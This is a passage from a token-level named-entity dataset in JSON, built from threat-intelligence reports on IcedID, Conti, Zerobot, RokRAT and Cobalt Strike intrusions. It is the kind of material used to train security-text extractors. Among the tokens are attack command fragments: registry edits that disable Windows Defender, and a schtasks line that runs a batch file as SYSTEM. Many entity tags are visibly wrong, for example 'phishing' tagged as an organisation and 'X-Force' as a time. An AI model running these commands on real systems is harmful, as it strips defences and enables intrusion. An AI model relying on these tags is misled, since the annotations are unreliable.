"beachhead", "host", "to", "systems", "throughout", "the", "environment" ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "details", "of", "the", "RDP", "session" ], "ner_tags": [ "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "the", "initial", "vector", "used", "by", "the", "threat", "actor", "was", "a", "zip", "file,", "which", "included", "a", "malicious", "JavaScript", "file,", "delivered", "through", "a", "phishing", "campaign." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "B-Way", "B-Tool", "O", "O", "O", "O", "B-Way", "B-SamFile", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "This", "RDP", "activity", "was", "being", "proxied", "through", "the", "IcedID", "process", "running", "on", "that", "host,", "to", "a", "remote", "proxy", "over", "port", "8080." ], "ner_tags": [ "O", "B-Org", "B-OffAct", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "in", "an", "effort", "to", "evade", "any", "detection", "and", "prevention", "mechanisms,", "they", "disabled", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "evade", "detection,", "the", "threat", "actors", "disabled", "Windows", "Defender" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "they", "disabled", "Windows", "Defender", "via", "a", "group", "policy", "modification." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "by", "adding", "the", "below", "to", "an", "already", "linked", "GPO." ], "ner_tags": [ "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "They", "then", "force", "updated", "the", "GPO", "on", "all", "clients", "using", "Cobalt", "Strike." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Cobalt", "Strike", "Beacon", "was", "dropped", "and", "executed", "on", "the", "system" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "was", "executed", "via", "rundll32.exe" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "including", "the", "computer", "name", "and", "the", "OS", "version", "of", "the", "compromised", "system", "were", "sent" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd.exe", "/C", "reg", "add" ], "ner_tags": [ "B-SamFile", "B-SamFile", "B-SamFile", "O" ] }, { "tokens": [ "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", "Defender\\DisableAntiSpyware", "DeleteValue" ], "ner_tags": [ "B-Way", "O", "O" ] }, { "tokens": [ "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", "Defender\\Real-Time", "Monitoring\\DisableRealtimeMonitoring", "DeleteValue" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", "Defender\\Real-Time", "Monitoring\\DisableBehaviorMonitoring", "DeleteValue" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", "Defender\\Real-Time", "Monitoring\\DisableIntrusionPreventionSystem", "DeleteValue" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows", "Defender\\Real-Time", "Protection", "DeleteKey" ], "ner_tags": [ "B-Way", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "actor", "used", "a", "redirector", "(38.135.122[.]194:8080)", "to", "proxy", "the", "RDP", "traffic", "being", "passed" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "This", "proxied", "traffic" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "LSASS", "was", "accessed", "by", "an", "unusual", "process", "“runonce.exe”", "on", "multiple", "hosts,", "including", "a", "domain", "controller." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "systems", "injected", "the", "Conti", "DLL", "into", "memory" ], "ner_tags": [ "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "web", "application", "vulnerabilities" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "exploiting", "vulnerabilities", "in", "Apache", "and", "Apache", "Spark", "(CVE-2021-42013", "and", "CVE-2022-33891" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "B-Features" ] }, { "tokens": [ "GrandstreamCVE-2020-25223WebAdmin", "of", "Sophos", "SG", "UTMCVE-2021-42013ApacheCVE-2022-31137Roxy-WICVE-2022-33891Apache", "SparkZSL-" ], "ner_tags": [ "B-Features", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "CVE-2018-12613,", "a", "phpMyAdmin", "vulnerability", "that", "could", "allow", "threat", "actors", "to", "view", "or", "execute", "files" ], "ner_tags": [ "B-Features", "O", "O", "O", "O", "O", "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O" ] }, { "tokens": [ "propagating", "through", "brute", "force", "attacks", "on", "vulnerable", "devices", "with", "insecure", "configurations", "that", "use", "default", "or", "weak", "credentials" ], "ner_tags": [ "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "default", "or", "weak", "credentials" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "using", "a", "combination", "of", "eight", "common", "usernames", "and", "130", "passwords" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "malicious", "payload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "downloads" ], "ner_tags": [ "O" ] }, { "tokens": [ "downloads", "the", "Zerobot", "binary" ], "ner_tags": [ "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "download", "and", "execute", "binaries", "of", "various", "architectures", "until", "it", "succeeds" ], "ner_tags": [ "B-Features", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "download", "this", "RAT," ], "ner_tags": [ "O", "O", "B-SamFile" ] }, { "tokens": [ "identify", "the", "architecture" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "copies", "itself", "to", "the", "Startup", "folder" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "methodDescriptionUDP_LEGITSends", "UDP", "packets", "without", "data" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "TCP_HANDSHAKEFloods", "with", "TCP", "handshakes.TCP_SOCKETContinuously", "sends", "random", "payloads", "on", "an", "open", "TCP", "socket." ], "ner_tags": [ "B-Way", "O", "B-Tool", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "TLS_SOCKETContinuously", "sends", "random", "payloads", "on", "an", "open", "TLS", "socket." ], "ner_tags": [ "B-SamFile", "B-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "methodDescriptionUDP_RAWSends", "UDP", "packets", "where", "the", "payload", "is", "customizable.ICMP_FLOODSupposed", "to", "be", "an", "ICMP", "flood,", "but", "the", "packet", "is", "built", "incorrectly.TCP_CUSTOMSends", "TCP", "packets", "where", "the", "payload", "and", "flags", "are", "fully", "customizable.TCP_SYNSends", "SYN", "packets.TCP_ACKSends", "ACK", "packets.TCP_SYNACKSends", "SYN-ACK", "packets.TCP_XMASChristmas", "tree", "attack", "(all", "TCP", "flags", "are", "set)." ], "ner_tags": [ "B-SamFile", "B-Tool", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "B-Way", "B-Features", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "B-SamFile", "B-Way", "B-Way", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "HTTP_HANDLESends", "HTTP", "GET", "requests", "using", "a", "Golang", "standard", "library.HTTP_RAWFormats", "and", "sends", "HTTP", "GET", "requests.HTTP_BYPASSSends", "HTTP", "GET", "requests", "with", "spoofed", "headers.HTTP_NULLHTTP", "headers", "are", "each", "one", "random", "byte", "(" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zerobot", "HTTP", "requests" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "open-source", "remote", "administration", "tool", "(RAT)", "with", "various", "features", "such", "as", "managing", "processes,", "file", "operations,", "screenshotting,", "and", "running", "commands." ], "ner_tags": [ "O", "I-Tool", "I-Tool", "I-Tool", "B-Way", "O", "O", "O", "O", "O", "I-Features", "O", "I-Features", "O", "B-Features", "O", "I-Features", "O" ] }, { "tokens": [ "running", "commands" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "screenshotting," ], "ner_tags": [ "O" ] }, { "tokens": [ "This", "attachment", "(unless", "zipped)", "is", "the", "MyDoom", "executable." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "executables", "attached", "to", "its", "phishing", "e-mails", "have", "an", "extension", "hidden", "by", "default", "by", "most", "Windows", "deployments", "(.cmd,", ".scr,", ".com,", "etc.)." ], "ner_tags": [ "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "file", "is", "a", "32-bit", "Windows", "executable", "packed", "using", "the", "UPX", "(Ultimate", "Packer", "for", "Executables)", "packer", "(https://en.wikipedia.org/wiki/UPX)", "to", "compress", "and", "make", "it", "more", "difficult", "to", "analyze." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "packer", "decompresses", "and", "executes" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "Upon", "execution,", "an", "attempt", "to", "alter", "the", "Windows", "firewall", "settings", "is", "made." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "makes", "a", "copy", "of", "itself,", "places", "it", "in", "the", "“Temp”", "folder", "(C:\\Users\\<user>\\AppData\\Local\\Temp),", "and", "changes", "the", "name", "to", "a", "known", "Windows", "application/process." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "activity", "thereafter", "included", "dumps", "of", "LSASS" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "process", "enumerations." ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "then", "launched", "by", "cmd.exe" ], "ner_tags": [ "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "the", "executable", "‘3ujwy2rz7v.exe’", "was", "downloaded" ], "ner_tags": [ "O", "O", "B-SamFile", "O", "O" ] }, { "tokens": [ "that", "uses", "command", "and", "control", "servers", "to", "collect", "information", "on", "compromised", "systems" ], "ner_tags": [ "O", "O", "I-Tool", "I-Tool", "I-Tool", "I-Tool", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "A", "user", "had", "to", "click", "on", "this", "in", "order", "to", "execute", "the", "malware." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "malware", "immediately", "begins", "to", "look", "for", "EDR", "and", "antivirus", "software." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Phishing", "emails", "spoof", "legitimate", "senders", "to", "deliver", "RokRAT", "via", "LNK", "files" ], "ner_tags": [ "B-Tool", "I-Way", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Email", "attachments", "mimic", "legitimate", "documents" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O" ] }, { "tokens": [ "several", "Zip", "Archives", "files", "hosting", "multiple", "lure", "documents", "likely", "sent", "via", "phishing", "campaigns" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct" ] }, { "tokens": [ "targets", "for", "phishing", "emails", "containing", "this", "type", "of", "decoy", "document." ], "ner_tags": [ "O", "O", "B-Way", "I-Way", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "campaigns", "typically", "begin", "with", "a", "phishing", "email", "with", "a", "ZIP", "file", "attachment,", "containing", "a", "LNK", "file", "disguised", "as", "a", "Word", "document" ], "ner_tags": [ "B-OffAct", "O", "O", "O", "O", "B-Way", "I-Way", "O", "O", "I-Way", "I-Way", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "I-SamFile", "I-SamFile" ] }, { "tokens": [ "containing", "obfuscated", "PowerShell", "scripts" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "the", "obfuscation", "technique", "for", "the", "dropped", "files", "being", "hex-encoding", "vs.", "string", "concatenation" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "contain", "an", "encoded", "PowerShell," ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "PowerShell", "scripts", "in", "charge", "of", "downloading", "a", "second", "stage", "RokRAT", "shellcode" ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "file", "download/upload" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "to", "start", "the", "download", "process" ], "ner_tags": [ "O", "O", "O", "O", "O" ] }, { "tokens": [ "downloads", "the", "payload" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "keylogging" ], "ner_tags": [ "O" ] }, { "tokens": [ "Optical", "Disc", "Image", "files", "(ISO)", "containing", "LNK", "files", "that", "had", "slightly", "modified", "PowerShell", "scripts,", "and", "Hangul", "Word", "Processor", "decoy", "documents" ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-SamFile", "I-SamFile", "B-SecTeam", "B-SecTeam", "O" ] }, { "tokens": [ "The", "ISO", "files", "that", "X-Force", "observed", "contained", "a", "LNK", "file" ], "ner_tags": [ "O", "O", "O", "O", "B-Time", "O", "O", "O", "B-SamFile", "I-SamFile" ] }, { "tokens": [ "a", "JPEG", "decoy", "file", "are", "dropped" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "JPEG", "decoy", "file" ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "a", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "a", "batch", "file" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "drop", "batch", "files" ], "ner_tags": [ "I-Features", "I-Features", "I-Features" ] }, { "tokens": [ "then", "the", "payload", "is", "executed", "using", "Windows", "API", "functions", "(VirtualProtect)." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "payload", "that", "is", "decoded", "using", "the", "first", "byte", "as", "a", "key," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "packed", "into", "a", "Windows", "executable", "file" ], "ner_tags": [ "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "stealing", "sensitive", "data", "from", "the", "victim’s", "networks." ], "ner_tags": [ "B-Purp", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "identifies", "data", "of", "interest", "from", "the", "network", "of", "the", "victim" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "can", "be", "anything", "from", "file", "and", "directory-listings,", "configuration", "files,", "manuals,", "email", "stores", "in", "the", "guise", "of", "OST-", "and", "PST-files,", "file", "shares", "with", "intellectual", "property", "(IP),", "and", "data", "scraped", "from", "memory." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "I-Features", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "collected", "the", "data", "from", "various", "sources", "within", "the", "victim’s", "network." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Credential", "theft", "and", "password", "spraying" ], "ner_tags": [ "B-SamFile", "B-Purp", "O", "I-Way", "O" ] }, { "tokens": [ "password", "spraying", "attack", "against", "the", "victim’s", "remote", "services," ], "ner_tags": [ "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "With", "this", "list", "of", "administrator-accounts,", "the", "adversary", "performs", "another", "password", "spraying", "attack", "until", "a", "valid", "admin", "account", "is", "compromised" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "adversary", "started", "a", "password", "spraying", "attack", "against", "those", "domain", "admin", "accounts," ], "ner_tags": [ "O", "O", "O", "O", "I-OffAct", "I-OffAct", "I-OffAct", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "user", "account", "was", "possibly", "compromised", "on", "the", "Linux", "server", "by", "using", "credential", "stuffing", "or", "password", "spraying:" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool", "O", "I-Way", "O" ] }, { "tokens": [ "Logfiles", "on", "the", "Linux-system", "show", "traces", "which", "can", "be", "attributed", "to", "a", "credential", "stuffing", "or", "password", "spraying", "attack." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "I-OffAct", "I-OffAct", "O" ] }, { "tokens": [ "Password", "spraying" ], "ner_tags": [ "B-Way", "O" ] }, { "tokens": [ "or", "password", "spraying." ], "ner_tags": [ "O", "I-Way", "O" ] }, { "tokens": [ "This", "adversary", "starts", "with", "obtaining", "usernames" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Purp" ] }, { "tokens": [ "The", "built-in", "Windows", "quser-command", "to", "show", "logged", "on", "users", "is", "also", "heavily", "used", "by", "them." ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Features", "I-Purp", "I-Purp", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "To", "identify", "if", "privileged", "users", "are", "active", "on", "remote", "servers,", "the", "adversary", "makes", "use", "of", "PsLogList", "from", "Microsoft", "Sysinternals" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "to", "identify", "if", "privileged", "users", "are", "active", "on", "the", "systems" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "These", "credentials", "are", "used", "in", "a", "credential", "stuffing" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "user", "account", "was", "possibly", "compromised", "on", "the", "Linux", "server", "by", "using", "credential", "stuffing" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "Logfiles", "on", "the", "Linux-system", "show", "traces", "which", "can", "be", "attributed", "to", "a", "credential", "stuffing", "or", "password", "spraying", "attack." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Org", "B-OffAct", "O", "I-OffAct", "I-OffAct", "O" ] }, { "tokens": [ "credential", "stuffing" ], "ner_tags": [ "B-SamFile", "B-SecTeam" ] }, { "tokens": [ "more", "specifically", "by", "credential", "stuffing" ], "ner_tags": [ "O", "O", "O", "B-Way", "B-Tool" ] }, { "tokens": [ "After", "obtaining", "a", "valid", "account,", "they", "use", "this", "account", "to", "access", "the", "victim’s", "VPN,", "Citrix", "or", "another", "remote", "service", "that", "allows", "access", "to", "the", "network", "of", "the", "victim." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "With", "this", "valid", "admin", "account,", "a", "Cobalt", "Strike", "beacon", "is", "loaded", "into", "memory", "of", "patient", "zero." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "used", "the", "valid", "account", "to", "directly", "login" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "threat", "used", "valid", "accounts", "against", "remote", "services:" ], "ner_tags": [ "O", "O", "O", "B-Tool", "O", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "accessed", "the", "company", "portal", "with", "the", "valid", "account." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cloud", "drive,", "or", "other", "cloud", "resources", "accessible", "by", "the", "compromised", "account." ], "ner_tags": [ "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "now", "armed", "with", "the", "valid", "account,", "was", "able", "to", "access", "a", "document", "stored", "in", "SharePoint", "Online,", "part", "of", "Microsoft", "Office", "365." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "starts", "using", "the", "Cobalt", "Strike", "beacon", "for", "remote", "access", "and", "command", "and", "control." ], "ner_tags": [ "O", "O", "O", "B-Way", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "the", "obtained", "valid", "account", "is", "already", "member", "of", "the", "domain", "admins", "group,", "the", "first", "lateral", "move", "in", "the", "network", "is", "usually", "to", "a", "domain", "controller" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "After", "this", "the", "adversary", "dumps", "the", "domain", "admin", "credentials", "from", "the", "memory", "of", "this", "machine,", "continues", "lateral", "moving", "through", "the", "network," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "and", "finds", "the", "trust", "relationships", "and", "jump", "hosts,", "attempting", "to", "move", "into", "the", "other", "domains", "and", "security", "zones." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "successfully", "got", "a", "valid", "domain", "admin", "account", "this", "way." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "In", "other", "cases,", "the", "adversary", "moved", "laterally", "to", "another", "system", "with", "a", "domain", "admin", "logged", "in." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "can", "be", "anything", "from", "file", "and", "directory-listings," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "adversary", "copying", "results", "of", "the", "discovery", "phase,", "like", "file-", "and", "directory", "lists", "from", "local", "systems," ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "If", "the", "data", "is", "small", "enough,", "it", "is", "exfiltrated", "through", "the", "command", "and", "control", "channel", "of", "the", "Cobalt", "Strike", "beacons." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "I-Tool", "O" ] }, { "tokens": [ "The", "adversary", "uses", "the", "command", "and", "control", "channel", "to", "exfiltrate", "small", "amounts", "of", "data." ], "ner_tags": [ "O", "O", "O", "O", "B-Tool", "O", "I-Tool", "I-Tool", "O", "B-SamFile", "I-Purp", "I-Purp", "I-Purp", "O" ] }, { "tokens": [ "adversary", "executes", "Cobalt", "Strike’s", "built-in", "Mimikatz", "to", "dump", "its", "password", "hashes." ], "ner_tags": [ "O", "O", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "We", "observed", "the", "use", "of", "Mimikatz", "on", "this", "system", "and", "saw", "the", "hashes", "of", "the", "logged", "in", "domain", "admin", "account", "going" ], "ner_tags": [ "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "the", "actor", "executes", "Cobalt", "Strike’s", "built-in", "Mimikatz", "to", "dump", "its", "credentials", "or", "password", "hash" ], "ner_tags": [ "O", "B-HackOrg", "O", "B-Idus", "B-HackOrg", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ ",", "staged", "on", "another", "system", "of", "the", "victim,", "and", "from", "there", "copied", "to", "a", "OneDrive-account", "controlled", "by", "the", "adversary." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Files", "and", "folders", "of", "interest", "are", "collected", "as", "well", "and", "staged", "for", "exfiltration." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "We’ve", "seen", "the", "adversary", "staging", "data", "on", "a", "remote", "system", "or", "on", "the", "local", "system." ], "ner_tags": [ "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "This", "activity", "group", "always", "uses", "a", "renamed", "version", "of", "rar.exe." ], "ner_tags": [ "O", "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "The", "adversary", "copied", "those", "tools", "over", "SMB", "from", "compromised", "system", "to", "compromised", "system", "wherever", "they", "needed", "these", "tools." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "DLL’s", "used", "were", "side-loaded", "in", "memory", "on", "compromised", "systems." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "File", "deletion" ], "ner_tags": [ "O", "O" ] }, { "tokens": [ "Use", "scheduled", "tasks" ], "ner_tags": [ "O", "O", "O" ] }, { "tokens": [ "The", "adversary", "heavily", "relies", "on", "scheduled", "tasks", "for", "executing", "a", "batch-file", "(.bat)", "to", "perform", "their", "tasks." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "An", "example", "of", "the", "creation", "of", "such", "a", "scheduled", "task", "by", "the", "adversary:", "schtasks", "/create", "/ru", "\"SYSTEM\"", "/tn", "\"update\"", "/tr", "\"cmd", "/c", "c:\\windows\\temp\\update.bat\"", "/sc", "once", "/f", "/st", "06:59:00" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "B-Way", "B-SamFile", "O", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "batch", "files", "for", "automation." ], "ner_tags": [ "O", "O", "O", "O" ] }, { "tokens": [ "The", "batch-files", "appear", "to", "be", "used", "to", "load", "the", "Cobalt", "Strike", "beacon,", "but", "also", "to", "perform", "discovery", "commands", "on", "the", "compromised", "system." ], "ner_tags": [ "O", "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "B-Way", "I-Tool", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "executing", "a", "batch-file", "(.bat)", "to", "perform", "their", "tasks." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "They", "switched", "to", "C2", "encapsulated", "in", "HTTPS", "in", "Q3", "2019." ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "B-Time" ] }, { "tokens": [ "the", "adversary", "achieving", "credentials", "access", "by", "brute", "force" ], "ner_tags": [ "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "The", "adversary", "installs", "a", "hackers", "best", "friend", "during", "the", "intrusion:", "Cobalt", "Strike." ], "ner_tags": [ "O", "O", "O", "O", 